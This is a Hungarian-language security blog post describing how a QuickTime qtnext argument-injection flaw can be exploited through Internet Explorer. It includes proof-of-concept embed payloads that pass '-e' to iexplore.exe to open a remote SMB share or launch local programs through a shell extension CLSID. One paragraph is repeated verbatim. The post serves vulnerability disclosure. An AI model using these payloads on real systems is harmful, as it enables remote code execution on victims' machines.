Azoknak akiknek esetleg nem lett volna világos, hogy miért is kellene a QuickTime-ot javítani egy hiba következtében, amely Firefoxon keresztül használható ki, most íme ugyanannak a hibának a kihasználása Internet Explorer alatt (köszönjük meg szépen Thor Larholmnak):
A hiba kihasználása gyakorlatilag ugyanúgy történik mint a Firefox esetében, néhány apróbb módosítással, de bizonyos szempontból még egyszerűbben. Explorer alatt az embed XML element qtnext attribútuma kell hogy tartalmazzon egy kettőspontot, különben a megadott kifejezéshez automaikusan hozzácsapódik egy "http://" előtag, ami ugyebár elrontja a játékot. De ne essünk pánikba, a megoldáshoz elég megnézni az Internet Explorer lehetséges parancssori argumentumait:
A hiba kihasználása gyakorlatilag ugyanúgy történik mint a Firefox esetében, néhány apróbb módosítással, de bizonyos szempontból még egyszerűbben. Explorer alatt az embed XML element qtnext attribútuma kell hogy tartalmazzon egy kettőspontot, különben a megadott kifejezéshez automaikusan hozzácsapódik egy "http://" előtag, ami ugyebár elrontja a játékot. De ne essünk pánikba, a megoldáshoz elég megnézni az Internet Explorer lehetséges parancssori argumentumait:
-k
Kiosk Mode
-extoff
No Add-ons Mode
-embedding
Application started via OLE Automation, causes IE to start with no chrome or any other UI.
-nohome
Skip display of home page (best used with URI argument)
-slf
Load home page from cache
-e
Explorer mode with split pane viewMinket a -e érdekel, melynek használatával úgy indíthatjuk el a böngészőt, mintha közvetlenül az explorer.exe-t hívnánk. Így pedig bármilyen külső fájlt elindíthatunk:
<embed src=”presentation.mov” autoplay=”true” qtnext=”-e file:////servername/sharename”/>Ez az `iexplore.exe -e file:////servername/sharename` parancs futtatásával lesz egyenértékű. Ez persze nem működik, ha az SMB kéréseket megfogja a tűzfal, viszont vegyük észre, hogy innentől kezdve távolról tudunk helyi hibákat használni!
Larholm ezen kívül egy másik lehetőséget is bemutat, mégpedig a helyi programok regisztrált Shell Extensionként történő futtatását:
<?xml version=”1.0″>
<?quicktime type=”application/x-quicktime-media-link”?>
<embed src=”a.mp3″ autoplay=”true” qtnext=”-e ::{3E9BAF2D-7A79-11d2-9334-0000F875AE17}”/>
A Shell Extensionök arra valók, hogy bizonyos objektumtípusokon végzett hagyományos műveleteket egyéni lehetőségekkel egészítsünk ki, a fennti kód egyszerűen elindítja a NetMeetinget, annek regisztrált Shell Extensionjén keresztül. Nem midnen programhoz tartozik ilyen kiterjesztés, ezért a lehetőségek száma ebben az esetben korlátozott. Azért itt vannak a PoC kódok:
NetMeeting
Vezérlőpult
System32
